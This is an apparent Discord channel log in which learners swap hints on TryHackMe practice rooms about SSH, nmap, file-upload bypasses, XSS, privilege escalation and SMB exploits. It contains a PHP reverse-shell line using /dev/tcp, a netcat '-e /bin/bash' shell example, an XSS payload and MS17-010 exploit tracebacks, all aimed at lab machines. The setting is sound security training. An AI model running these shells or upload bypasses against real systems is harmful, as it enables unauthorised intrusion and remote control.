#room-hints

Not the Attack Machine

no

oh

how do i log in usinhg ssh

May I ask where you got that pepe emoji in your status from? 😄

ssh username@ip

could not resolve hostname

nop can i pm you

Thanks

Gave +1 Rep to @inland cargo

Sure

You might need to add me first

Go ahead

Hey!

I need some hint for theseus, i'm stuck with the crypto stuff :///

I think it's rail fence cipher

anybody available for a hint for priv esc on cold vvars room?

Its the title of the room 😛

Check env.

thanks

Gave +1 Rep to @inland cargo

Im a bit confused on Socat, how do these relays work? I kind of understand it but im a bit confused how the shell will be forwarded to the relay if the relay doesn't have the target that we want a shell on in the syntax?

like this diagram, so if I ran i.e nc 127.0.0.1 8000 -e /bin/bash on a target deeper in the network, the relay would catch that and forward it to the kali machine?

ohhh yeah i think i kinda get it now actually

if i ran a shell on a target with 127.0.0.1 port 8000, and port 8000 is linked to the relay, of course the relay would catch it. Have I understood this right?

Im at the OWASP T10 at XXE and im trying to find a SSH key location.

Afaik i can only read files but not directories. I also cant pass any commands to the parser.

I only know that the directory must be /home/falcon/.ssh/******

Any hints on how to solve this?

Try the default name for private keys 😉

I somehow thought the keys themselves are named private* somewhat

Thanks for the help

Your welcome 😄

Im always overcomplicating things.

kali also messed my thoughts up cause i was looking for the path over there and saw it was /.ssh/authorized_keys/[keys]

Authorized_keys should be a file though containing the allowed public keys

Yeah. That reminded me that i should reread SSH stuff

you should take a look in the .ssh folder for cool files

you are searching for an rsa private key

yep ive did that. the .ssh was a easy guess anyway. i just got confused by not remembering ssh keys name and then overcomplicating things lmao. the whoe thing was so obvious but hey, why not wasting an hour by needlessly modifying the payload. at least ive seen some different XXE payloads now

Anyone have the walkthrough of attacktive directory

Network Services -Task 10. What is the estimated time of completion using bruteforce? Just in this instance.

For the Coldvvars room so annoying. Times out all the time.
I cannot even connect now, terminated twice and waiting more than 5 mins .The site doesn't show up :/

     command: /usr/bin/python -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-6xgk8mn5/wsgiref/setup.py'"'"'; __file__='"'"'/tmp/pip-install-6xgk8mn5/wsgiref/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' egg_info --egg-base /tmp/pip-pip-egg-info-gr1eepq3
         cwd: /tmp/pip-install-6xgk8mn5/wsgiref/
    Complete output (8 lines):
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/pip-install-6xgk8mn5/wsgiref/setup.py", line 5, in <module>
        import ez_setup
      File "/tmp/pip-install-6xgk8mn5/wsgiref/ez_setup/__init__.py", line 170
        print "Setuptools version",version,"or greater has been installed."
                                 ^
    SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Setuptools version",version,"or greater has been installed.")?
    ----------------------------------------
ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.
WARNING: You are using pip version 20.2.2; however, version 21.1.3 is available.
You should consider upgrading via the '/usr/bin/python -m pip install --upgrade pip' command.```

doing this room called ZTH obscure web vulns

but i am facing this issue while install tplmap

can some one help me

Can you give me a little more indian?

Which stage you are at?

find usernames & pass

Checked the first hint?

Checked the room tags?

I didn't understand the room tags.

Have you tried reading resources on the room tags from internet

Of course it's

but I don't get it

You got the login page?

Try the vuln on the page

yes

Try the vuln mentioned in tags

thx.

Looks like you are installing wsgiref in python2 in a python3 environment. The good news is that wsgiref should already be in your python on kali, so you can just delete it from the requirements.txt file. That might not completely solve your issue - the instructions do recommend installing in python2, but you might want to move past doing that.

even if it is avalible , i am not able to run the script

anyone did theseus?

please where can i get the flag in root.txt for CCPENTESTING room

Is it not located in /root ?

in /root

Yeah, tbh I think I just answered the question and moved on. Can't find it on my system, so I guess I didn't bother with it. Shame as it looks useful

I thought that all the things was a good hint...guess not

🥲

Try other way to get in. Maybe something easier.

I like challenges, i know that the cipher is rail fence but i can't decode it, maybe i'm not thinking out the box enough...

Anyone know the best way to exploit sudo -l of /etc/init.d/cron? I'm stuck on this one and yes I'm a rookie lol

gtfobins ?

I didn't see a listing specifically for /etc/init.d/cron

Am I doing something wrong here? It says Hello, doesn't it?

Need Hint Regarding "Overpass"
Can anyone tell me which Owasp top 10 vuln should I test on this?

Hi everyone... I am stuck in Linux Fundamentals Room 3 in the Pre-security path. I try to connect to the MACHINE_IP using "ssh tryhack@MACHINE_IP", but it responds that the connection was refused at port 22... I have tried this twice. Twice meaning 2 times {start machine->start attackbox->ssh from attackbox terminal->refused->again ssh->refused->terminate attackbox->terminate machine}. still doesn't help. Any idea?

Start the room machine, and use that vm's ip, not the attackbox ip

ssh tryhackme@"roommachineip"

Are you referring to overpass1?

||if so then you might take a look at bypassing||

No

I was referring to Overpass 1

uhhh

?

That's what I just said

in "The find command" how to make perm parameter correct?
"**** / ***** * ***** **** ***** **.***"

in the find command room, shouldn't the 3rd answer be: find / -type d -name "exploits"

The perm parameter does not require quotation marks but a -

"That contains" so you need to prepend and append a globbing character

"exploits" is only a part of name

hmmmmm

still don't get it ahaha

whatever-exploit-whatever.sh should also be found

not just the file "exploit"

ok

nice hint

hahahahah

thanksss

hmm, -o=w also doesnt work, did i missunderstand you?

What room is it?

"The find command"

No -o=w is fine but why are you looking inside /usr/bin ?

oh, idk
thanks)

😄

Anyone have the walkthrough of attacktive directory

Hello. I'm new to the discord so i'm still not very sure on how to approach topics on here (despite having read the rules and introduction)
I'm currently doing the Complete Beginner Path -> Network Exploitation Basics -> Network Services -> Task 6: Enumerating Telnet -> question 6.
I'm not sure on how to express some of my doubts or ask for a very gray hint on the subject so i'll just say this for now :/ 😅

Something someone may use to gain unauthorised access

i think it's even mentioned in the scan if you read through it

@astral smelt Thank you for the hint! Some answer templates really confuse me and i start to do research on my own doubts 😆 thank you again

Gave +1 Rep to @astral smelt

On the Kali Linux terminal, how do I know the openvpn is connected or not? The last line I see is "Initialization Sequence Completed"
And then blank. Nothing of the sort lik showing a directory or something. The line below is blank, though it accepts cursor input... I tried the room https://tryhackme.com/room/openvpn. It helped for Windows, but nothing much for Kali Linux. Am I missing something? Please help.

I tried entering ssh tryhackme@"IP", but it still stayed blank after that input... then I "ctrl+c"-ed to come back to the terminal default operation of showing the working directory.

you will need to open another terminal, in order to connect if you didn't put your openvpn on background

normally with "ip a" you will see a tun0 interface with your current IP on the VPN

You mean I can't work on the same terminal? Wait let me try once...

sudo openvpn xxx.ovpn &

if you want to have it in the same terminal

it will go in background as a job

Can I text you personally N1M, if you don't mind? I think I would like to clarify a few things too that I didn't mention, don't wanna mess the room up 😅

yes you can

Hi guys..I'm stuck on SteelMountain. How can you replace a file that runs? I can't kill the process as i don

as i dont have permission*

stop the service

Stuck on my first CTF practice 🙂 Stuck on Root Me CTF, trying to upload reverse shell. No matter what I put in the file with PHP/reverse shell, I don't see anything on the listener 😦

Which php shell are you using and what file extension?

stand by lol

||<?php
exec("sudo /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

extension shell.php.jpg||

(i'm pretty sure I don't know what I'm doing)

Hmm shell should work else give the pentestmonkey php shell a try ||and dont use jpg as the file extension but an alternative php extension||

like ||php3||, etc what I've been seeing?

yea that'd be one example

...do I literally just upload this? haha

changing with your ip should be fine 🙂

looks like it just goes through a bunch of methods?

Adjust the IP and port and then you are ready to go

okay cool, i saw those in the file a second ago

hmm

doesn't seem to work using either open port

Which port are you using?

22 & 53

let me scan it again

You should do the "What the shell" room or what it was called on THM

fucking 80

you obviously can't use 22 because that'S used by SSH already

is that a shell room?

use 4444 for example

ohhh

https://tryhackme.com/room/introtoshells

on your local machine you need to : nc -lvnp 4444

okay

matching the one in the php file 😛

well yes

lol

will this help me with scripting and stuff? That intimidates me...

no

but you usually don't script your reverse shells from scratch

okay

I don't need to escalate priveleges yet, do i

yes you will need following the next question : https://www.tecmint.com/how-to-find-files-with-suid-and-sgid-permissions-in-linux/

okay cool that's what I was thinking

[SOLVED] I would like to request a hint for Network Services room on task 4(Exploiting SMB), at the end question with the flag. I have to figure out the username of this particular person in order to ssh into the work server. But it seems I'm brute forcing at this point and I'm wondering if there is somewhere I should be looking where I haven't already.

Where I looked so far: ||the .txt document in the profiles share only so far. Another share is open but that doesn't seem to contain anything. There was one .txt file where I picked up the name of a person and I already picked up the identity file for use with SSH service. I keep receiving a port 22 connection close with every different concatenation of the person's name as username for ssh.||

Any tip on Revenge room?

I only got the first flag down, and I have the database dump but I don't seem to know what to do if the password encryption is secure against lookups

Nevermind finally bruteforced one user found the password

can anyone give me a nudge on coldvvars room for foothold? I did everything i can on enumeration and still not able to get a way in (i can tell you more on what I have done till now in the dms)

For SteelMountain, would you use the AbuseFunction (from running Invoke-AllChecks) to replace the file with the one generated from msfvenom?

Im doing Upload Vulns room, for client side filtering, I viewed the source code but it doesnt show anything saying file type. How do I know what file type is available on the website then?

If you cannot gain information from the javascript source code it's simply trying until you find it

Okay, i did try it using an extension that is allowed, but even if I successfully uploaded the file to the server, there is still no response saying the MIME type

If its the task I'm thinking of, are you capturing all the responses from the server in Burp? You might find the info in one of them

Yeah im capturing the responses

It doesnt come out as the ones said in the module..atleast

One of the responses should be the java script file. Let me boot my laptop up. What task is this?

task 7

client side filtering

i use png extension

Ahhh, did you go into options > intercept client requests and remove the reference to ^js$|

ah i didn't

wait i try

You might have to force refresh the page as well

Do i have to do that before i intercepted the first response or after I uploaded the file?

Before the first response if i recall

Thats weird. still invalid lol

Want to drop into DM and talk it through?

sure

Web fundamentals XSS Task three part 5, Jacks cookie. Every time I paste the script in it goes to a web page not found. and then I cant go back to the original page? The cookie in the url doesnt work. Burp gives me an attacker errror

i get no hints about logs either

You could, but that is not the path the room author suggests.

Hmmm ok I know it says to replace the executable, but I don’t have permissions even after running PowerUp.ps1. I try to rename the service’s exe file to replace with the Advanced.exe from the GitHub, but says I don’t have permissions. I’ll just keep messing with it, thanks (also I stopped the service before attempting to make changes)

Gave +1 Rep to @queen cliff

Something sounds not quite right with your approach. A few quick hints that may be helpful: (1) Note the PowerUp script is just for Invoke-AllChecks (in other words, information-gathering; has nothing to do with changing permissions on anything), (2) You can directly ascertain file permissions within meterpreter (where you should find you already have all the permissions you need to replace the file), (3) Why are you getting Advanced.exe from GitHub? Aren't you supposed to generate a payload with msfvenom in this room?

I'm also on the client-side uploadvulns thing, and it seems like mu burp is just freezing after I press forward? It's just blank

I see, thanks that helps a lot. Yes I generated it with msfvenom sorry I got the rooms confused a bit.

Gave +1 Rep to @queen cliff

Hi, im having issues with File Upload Vulns room in task 7. I intercepted the request and send a response on client-side js ,the response only shows file.type but nothing of name="fileToUpload" where i can change the file extension. How do i work my way around this?

and selecting another file extension from earlier doesnt seem to work either. It says "invalid file type"

Thanks @vital crown

Gave +1 Rep to @vital crown

Hi Sea_Bas, did you solve task3 for CCT2019?

doing Juice Shop Room, Task 7 — Not getting anything after ending JS XSS alert snippet, am I supposed to? Question #2 prompts for an answer or flag but I don't see any generated or any next steps

i am having trouble in THM upload vulnerabilities room. the last challenge. after uploading the shell in the format of jpg when i am going to execute it throuth the admin page it showing module does not exist. plz help

Do not modify anything that gets checked on the client-side

Anything?
Shado_Tek — Today at 00:25
Web fundamentals XSS Task three part 5, Jacks cookie. Every time I paste the script in it goes to a web page not found. and then I cant go back to the original page? The cookie in the url doesnt work. Burp gives me an attacker errror

Shado_Tek — Today at 00:33
i get no hints about logs either

Are there any tools I can use in Kali Linux to find the function with ASLR/DEL disabled in https://tryhackme.com/room/brainstorm. and how would I know it actually has ASLR disabled?

I wouldn't use Kali for debugging as it is a Windows binary file

@rain latch and any tools or debuggers you can recommend?

Immunity Debugger, you can then use mona to find such functions

@rain latch I tried using it, but it told me the binary was invalid or something. Is it purposed to be debugged with a 32 bit version on Immunity Debugger?

Can you run the binary itself?

@rain latch I can't. I am prompted that it's incompatible with 64 bit versions of Windows.

You probably got the file via FTP right?

@rain latch exactly

Take a look at the binary mode of FTP this will help you and fix the problem 🙂

alright. I'll try it again. thanks @rain latch

Gave +1 Rep to @rain latch

Your welcome 😄

Binary - Shiba1, I created noot.txt and when I did ~/noot.txt it said I dont have permission to it

any hints?

you need to run the file in folder

wdym

@glacial gust

there should have been a binary already in the folder that you need to run after you create the noot.txt

shiba1?

~/shiba1?

just ./shiba1

shouldnt there be a /?

also not working

it says no such file or directoryu

then you're not in the correct dir where the binary is

How do I go there if so

you find where the file is and navigate to that directory

or you call the binary with absolute path

dont know how

you should have created the noot.txt in the home directory, the shiba1 is in the same dir

I just used the touch function

nothing else

when you run the shiba1 binary it should work then

it doesnt...

when I tried to locate shiba it gave no respond

when I located noot it just said its in root/

if you verify you can post screenshot

!docs verify

@fleet spire I would strongly recommend getting a grasp of operating system fundamentals like listing and finding files, switching working directory and lots of other concepts before trying more advanced concepts like exploitation

man ls
man find
pwd, cd and other commands

Can anyone help out on a Golang server? I'm working on an assessment and never have done one before. Thanks.

Network Services-Task 9 Enumerating FTP.

My NMAP scan shows only 1 port open, the answer box says I'm wrong. Could someone check I am not going crazy please?

Try -p- for all ports?

I'll give it a go, not hopeful though as the one it didn't find is a well known port

Did you run nmap a 2nd time? It's possible that it missed it

I did, and it found it. Is that pretty common for nmap to miss it? That could get quite tedious when scanning all ports.

I am using the attackbox mind, would it be quicker on my own kali box?

Thanks for the help @nop @woven nest

Gave +1 Rep to @woven nest

@woven nest thanks!

@random furnace no prob!!

I'm in room CC:Pen Testing and I'm stuck at section 7, getting the root.txt flag. I have acquired the user.txt flag and tried to privilage escalation script to gain access to root but got no luck. Any hints pls?

Nvm found it

I just need to list the privilage that current user has

hello i am trying to get access to eternal blue but i am constanly getting this

Exploit completed, but no session was created.

room: eternal blue

Hi everyone

I was working on the Pickle Rick room, and was stuck on the 2nd ingredient. Was hoping if I could get any hint :3

I guess this is the right room to ask this

Check your options, particularly IP addresses and ports

have you gotten into the machine?enumerate the file system , it will be easily visible..

Yeah I have found the first ingredient, also read the clue.txt file

Hello, I need some help with That's The Ticket

But I'm banging my head against the wall for the 2nd one

Checked the home directory of the user?

Please someone help with this "Pickle Rick room"

I've tried all sorts..
I'm suspecting x-forwarded-for http header for the 403 dir but yet, I can't even bypass the stuff:sob: :sob:

Please hint me up, I hate write-ups:sweat_smile:

Hello! Can anyone help me with my last question needed to complete OSQUERY? It's Task 9 Q5, schema for event log data. I thought i had it correct, but it wasn't accepting my answer, so I looked more in depth at the answer format. It seems I'm 6 characters off at the end, but I'm at a loss for what they could be. I have the fields and the types all there, but there's a whole extra word at the end that I can't figure out.

You may DM it to me and check for you. 🙂

checked ....still not working ..

All solved. 🥳

Howdy, I'm in the Practical - Network Simulator part of "Extending Your Network" and the site asks you to send a TCP request from computer 1 to computer 2. Doesn't seem to do anything no matter what I select. Any hints?

Yes, in the home directory itself I found the first one. And there is even a clue.txt file which says to look in the file system to find the 2nd one. The problem is I can't navigate myself out of the home directory. cd or cat doesn't work.

You got the rev shell? Or using portal?

can anyone tell me what the problem might be ?

Using portal

I alreayd did it.... I'm following the rooms

would be better if you asked in #room-help with screenshot + additional info

Any hints for riddlemethis question 2? I know what it is but still can't work it out. (even automated doesn't work 😦 )

Anyone working in Diana initiative CTF??

Anyone working on Linux Fundamental part 3 please

Why do you want to analyze it on Linux?

it is a windows binary

Yea it is a windows executable running on a linux machine

😉

yea

your welcome

Get a reverse shell first then
It will be easy then

yo wz poppin i need help on the room GamingServer, i've the user flag but i dunno the next step, can someone push me in the right direction?

Okay then. I found the 2nd one. I guess I will find the 3rd one by using the reverse shell. Thanks for your help 🙂

Gave +1 Rep to @tulip mural

I have a question about subnets. As far as I know, they're a network in a network (as the name suggests). I'm always confused by this sort of stuff though where it asks to write out the ip. Could someone help me understand this a bit better or point me in the right direction please? Thank you in advance

You split the network and client scope of a network, an ipv4 address has 32 bits, with the /** you tell how many bits re for the network

/24 means a subnet mask like 255.255.255.0 ( binary 11111111.11111111.11111111.0) so in the network 178.18.1.0/24 - 178.18.1. is the network and 178.18.1.1-254 re the clients

Help me with GamingServer root

hmmmm okok

thank you for the explanation :D

idk what GamingServer root is

There are videos on yt

A room, i want a hint

Hi Carbon based lifeforms , i been stuck on the exploit 42315.py having some errors can somebody help me ? im pretty sure the exploit is for python 2 , i cant seems to make it work after going around it for a few day (im not the best on python,yet)

python3 42315.py 10.10.117.156 1 ⨯
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: samr
Traceback (most recent call last):
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 998, in <module>
exploit(target, pipe_name)
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 834, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 489, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 333, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/home/odcr/Desktop/THM/Relevant/mysmb.py", line 349, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/odcr/Desktop/THM/Relevant/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str

used this one too https://github.com/worawit/MS17-010 same result

python3 zzz_exploit.py 10.10.117.156 1 ⨯
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: spoolss
Traceback (most recent call last):
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 1057, in <module>
exploit(target, pipe_name)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 835, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 490, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 334, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/mysmb.py", line 349, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str

Nice
NP Anytime

ah finished gameserver, sometimes your stuff comes per ship and than it may takes longer, but finally it has arrived

Just for info, if you wrap the cli output in ``` blocks, it formats it as code and makes it much more readable

Also I'm pretty sure that machine is not vulnerable to that exploit

Also also that exploit is likely written for python3 not python3

Thanks for the tip , that made me go back to my steps and rooted the room fairly fast after

Gave +1 Rep to @ripe hedge

The first line in the script let's the kernel know which shell to use for the script. Its also a good reference on what binary you should execute the script with (e.g. python in this case not python3)

In network services 2, task 4, I managed to get shell as root, but can't seem to find the root flag. What am I missing?
cappucino@polonfs:~$ ./bash -p
bash-4.4#

The rootflag usually is in the /root directory, else you could use the find command to look for it across the filesystem.

Yeah tried that, used python and the output is that mysmb.py miss even if its there

how to do this from HTTP in detail, Task 7

The explanation is right there

I dont understand it

what to set to value 1?

which is the id parameter?

That's the parameter you have to create

and I type idparameter?

I set it but still nth

can you tell me the name of the parameter

"id"

thanks im dumb

I'm in a room that is called Introductory Networking and I get the question "What kind of protocol is TCP?". I may seem very stupid but could someone help me with this question?

The answer is in the text above the question (or can be found by conducting some simple research about the protocol)

Ok, I'll research it

Thanks, will try that

Gave +1 Rep to @rain latch

Success, thanks!

Gave +1 Rep to @rain latch

Your welcome 😄

Gave +1 Rep to @near flame

hi in the room "network services" at "exploiting SMB" there a question im stuck at: " Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"

do they ask about what username the profile folder belongs to?>

can i get a hint for the picklerick CTF?

so far I've used gobuster to find directories, nmap to scan some ports, and checked the source code for a username, not sure where to go from here.

They are asking for the full name of the person

Think about what you would look at or open while in the SMB Share in order to see a person's name. Is there anything in there that says "Yeah, this will address someone?"

I just did this one the other day :)

i actually did that already thanks!

Look a little more. It's all there you may have just overlooked it.

hmm

I have tried accessing the successfully uploaded PHP reverse shells in Task 9(Magic Numbers) of File Upload Vulnerabilities room and for the majority of extensions I get "The image cannot be displayed because it contains errors" and for ||.phps files I get Forbidden for both /assets and /graphics paths||. I have set up a netcat listening port as well on the default pentestmonkey shell port 1234 but nothing so far.
Any hints would be great thank you.

I referred to my notes and it should be there

Is php uploading allowed? Maybe it blocks uploaded php from functioning?

I can upload .php5 files and other variations of the extension .php, along with the magic numbers string for GIF files the php shells are successfully uploaded but I guess when visiting the shell directly through the URL I receive a error saying it can't display the image but the connection isn't even set up.

Oh for crying out loud

I finally go it! I didn't include the 6 characters before editing in the hex string for the appropriate file signature.

I forgot that step.

jalapenyoo I had the exact same question. Thanks for asking that haha. I am only using 4 digits. does that make a difference ?

Hi everyone, I'm in OWASP Juice Shop task 7 Question #1: Perform a DOM XSS. After searching here and seeing some of the same issues but not finding the answer (I've double checked the question and the input: <iframe src="javascript:alert('xss')">). I get the pop up but no flag. Would someone point me in the right direction?

When I copy and paste into my browser and not manually input it in the browser kali box, I got the flag. I'm still confused because I don't see a difference.

Nevermind, wrong character... DOH

I want to say yes because in the jpeg example magic numbers the string was 4 letters which is 4 bytes long the same byte count as the signature for jpeg and so the editing was 4 bytes of hexadecimal digits replacing the already reserved slots that was marked from the ascii AAAAs. So based on the example I think it does matter that how many random alphabet letters you type and so that's why I added 6 As so that it matches the byte size of the file signature in question in the task flag question.

But if you want to double check definitely do 4 only and see if you get a error like I did which would mean you DO need the length being appropriate to the signature of the whitelisted content type.

Anyone having trouble with the Internal Room ? When I try to access internal blog I got this page, and I'm not able to access the log-in page propely. Always having issue with Server Not Found.

Add it to your hosts file :)

So I'm on Exploiting SMB and I'm having issues with accessing documents in the profiles share. I'm logged in, I can ls the files, but I'm unsure how to open them to read and google has been of little help. I've tried linux commands nano, cat, etc and the SMB command of "open" but it just tells me file not found.

Also When working with a document with space "Working From Home Information.txt" I try putting underscores where spaces would be but I get the same file does not exist error. Any help?

you need to get the files to your local machine, for the one with spaces have you tried just putting quotes around it

Ahh, so it'd be

get "Working From Home Information" root/Desktop ?

you don't have to put the destination, it will use the folder you are in

Thanks blackdragon, I was thinking about it too much.

Gave +1 Rep to @glacial gust

np

But get does not work for .ssh files

hmm

nvm it;s a directory

I'm in the Network services section Enumerating Telnet and it asks me what port is open.

I see 3 ports open 22/tcp, 139/tcp and 445/tcp. I put 3. Wrong. I put 1 and it's correct. This is confusing. Now it's asking what port is open looks like 4 characters, but I tried all those ports and it's still not working. I don't see any other ports open via nmap. Very confusing

How many ports did you scan?

I'm doing Pickle Rick room and I am stuck in logging into Rick's computer. I found ||the username and I know there is a ssh service available on Rick's computer however after attempting to brute force password using Hydra I receive an error saying this server doesn't support password authentication and by transition when I ssh using the login name I get an error which I am looking up at the moment, and it means there is public key authentication. But I am stuck here. I also know that id_rsa is the identity file starting with ssh version 2 but that would require it being on the server itself wouldn't it? I have no access to that.||
Just a small hint is fine.

I did that quite a long time ago so I am unsure if anything changed, but you may have hit a rabbit hole. You should enumerate a little more.

enumerate how exactly? enumerate as far as directories would you say? files?

You are thinking along the right path.

DM me if you need anymore hints. I won't be giving you answers

@ashen matrix ok thanks

Gave +1 Rep to @ashen matrix

Found something! haha amazing thanks again!

Room ustoun, I am able to get sql username and password, but cannot get sql shell?

Looking for a nudge on internal, I have shell but think I found a rabbit hole for priv esc

Hi, somebody can gimme hint with "Blue"?

lookup xp_cmdshell as a sql command

So anyone done the metamorphosis room yet?

Hello, I'm on the room "wgel" but I'm stuck on start: I already found ||/sitemap|| and the ||id_rsa file|| but now i can't manage to find ||the user associed with the ssh key||. I already tried to ||use the names of the developers on the "about" page, twist them etc|| but I'm out of options

@hexed fog you need to look a little more

@hexed fog Maybe a webpage might have some information?

Also tried ||the guy from the blog||

And ||the people in the templates||

well, i've been spoiled when looking for hints but i don't want to go further 'till i understand what to look for so i'll just continue searching and if u have any hint to help where to look at i'd appreciate it

@hexed fog Maybe go beyond the front face of a webpage. Looks at how the webpage is formed. Make sense?

I am trying to give you hints without straight up saying where to look lol

well, it's just a ||template website|| so i don't see what could be interesting in there

ok maybe my hint wasnt right. maybe you should look at the webpage source code

even on the ||contact page|| there's nothing useful

I have told you where to look, the rest is up to you to find it. I referred to my notes and i detailed how i found what youre looking for.

yes thx, i'm looking for || made by XXX or something that'd mention the author||

but looking each div 's pretty boring xD

what do i do with the ip address

i have no idea what im doing

Are you talking about when you start a machine in a room?

Hey, I was solving Attacktive directory Room.
For getting a full-control on the AD-Domain, I can either use Evil-WinRM (as suggested in THM room) or impacket toolkit named psexec.py ...

yeah

But I noticed after using both of them to test, that each of them produces different type of shell

psexec.py produced: nt authority\system
Evil-WinRM produced: thm-ad\administrator

Any Help??

You need to use either the attackbox that is built in or download a VM version of Kali Linux or Parrot OS. There are rooms in THM that can guide you through it and I recommend you start there if you are unsure how to proceed

i just downloaded openvpn

would that work?

You would also need to download a variety of enumeration tools and other binaries used to decrypt and brute force, etc.

I would highly recommend you search for a THM room that is about setting up Kali Linux or using the built in attack box on how to start with TryHackMe

i dont use linux

Then I cant help you sorry

np

thank you for trying

np. I recommend you learn linux, plent of rooms on THM to help. I didnt use Linux when I first started as well

I'm talking about this...

You won't need to login to the ssh. That is a kind of rabbit hole. This is the biggest hint I could give you at the moment.

It was answered already but thanks anyway

Gave +1 Rep to @mental quarry

You can download a Kali Linux VM and you should learn a bit of the Linux commands, as learning them and using linux in general would make it easy for you to complete the rooms. To learn linux, you can try Bandit from OverTheWire. It's pretty good for beginners.

I saw that just now. :'3 nvm :3

Any help??

VulnUniversity : room

The operating system question is wrong, tried linux, windows, linux

any idea

name of the operating system

yes

yes it is the clue

not linux, but what kind of linux

What is the most likely operating system this machine is running?

nmap scan should gave you the answer if im not mistaken

This was the question

nmap wont

what flag you use to scan

-O

in one of the service found, is there like a name of linux thing?

I am sure its Windows, because port 445 miscrosoft-smb

nope

But the answer is wrong

10.10.229.59

target

rescan with -A

All done, OS is not predictable by nmap

I dont mean to be rude, but you know there are "variations" of linux, right? there is this linux, that linux, and so on

yeah

anyways will check again

thnks

in one of the port found by nmap, if I remember correctly there should be hint what one of the program is running from

Just checking if anyone done for that box

yeah hint is -O scan

i cant give yu way too much hint, since its pretty much instant answer

okk

dm if you need more help

sure

THank you, but I could not upload any executable although I was able to get smbshell with what you suggested.

Gave +1 Rep to @glacial gust

I will give it another shot later tonight and will ping you if necessary.

Thanks again. @glacial gust

Regular expressions
it seems to be working, but the answer is incorrect.
need hint how to pass this task)

same here(

try (c|h)

let me check

no, | is shown in next task

[ch] then

thank you)

Gave +1 Rep to @ripe hedge

be a bit more literal on that one

ahah, ok. got it

yours works as well

does ^ works as beginning of line and as 'not' simultaneously, or it has to be \D

answer tolerance doesn't take case into account I think

refresh the page

it worked, but it seems for me, there have to be \D
it might be case sensitive in this room

understandable )

initial nudge on Metamorphosis?

Anyone completed internal? I’m stuck on priv esc

enumerate

poke at any unusual services

I’m avoiding watching the video walk through but… I’m stuck right now haha

should be an internal service lying around

I had to use the video but I learned tools don’t always help and you need to look with your eyes… sometimes stupid files are left around

I already had the internal service, and shell on the box and the service

I don’t use Linux

Hello

did anyone found the DoB of OWoodflint ?

which room

A private hackathon.. we have that question at the end

First time here, not sure if this is the right room or not. Please read my question below.
My issue is I'm not seeing the answer they want in the title that was returned to me. NMAP Command run is "nmap -A [IP]"
Based on the title returned to us, what do we think this port could be used for?

Room is "Network Services"

which section

Did you do -p- for all ports? If not see if that can get you more ports

I did -p- for all ports and it returned "8012" as the open port. The second question says "Now re-run the Nmap scan, without the -p- tag, how many ports show up as open?" 0 showed up as open. Now, the question I have the issue with is "Based on the title returned to us, what do we think this port could be used for?"

Enumerating Telnet. (Now re-run the nmap scan, without the -p- tag, how many ports show up as open?)

your -p- scan should have given you some details in the output that should provide the answers you need for the 6th and 7th questions

That's the problem I have....Its now showing me anything useful for the 6th and 7th question

after port 8012, is there any output data with it

Nope

try the -vv switch for verbosity level 2

I'll try that. Thanks

this finally worked "nmap -n -p8012 -sV [IP]"

The -A switch includes version scanning I didn't know it'd be different output.

Very cool.

I didn't know that too. I guess we learn everyday.

Thanks a lot

the nmap room covers a lot the switches

I'll make sure to check that out

Hello all, having an issue with Burp Suite Module Task 8. The error after sending the HTTP POST to the repeater and intruder, what is the error you get when you change the user name and password to '

I tried a few different things and cannot get the right answer

How exactly have you entered the ' in the Repeater window?

Hi folks, would appreciate getting a nudge on Cyborg room. I've run the nmap scan and identified 2 services running - ssh and http. I'm trying to exploit the first one through a user enumeration vulnerability (for about 2 days now), but I'm not sure if it is my wordlist or the vulnerability I'm trying to exploit is the issue.

Didn't want to look at write ups first as I'm trying to develop the mindset

what do you have so far?

Are you using rockyou.txt?

Complete Beginner Path: Web Hacking Fundamentals: Web Fundamentals...

I'm on the mini ctf at the end and I'm not quite sure what to do.

I've made notes on the content of the room and I feel like I understand it pretty well but when it comes to solving the ctf, I'm not sure what to do. I got that to get the first flag I had to do: curl http:// [IP]/ctf/get.

I tried using -X POST to define the kind of request.

I remember reading that the body of the http request didn't matter in GET requests but they do with POST. However, I'm not quite sure I understand how this works.

Any help would be greatly appreciated :)

ok woah I misread the question wow.

Ok got it. That was silly 😂

In Complete Beginner Path: Network Services: Exploiting SMB
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

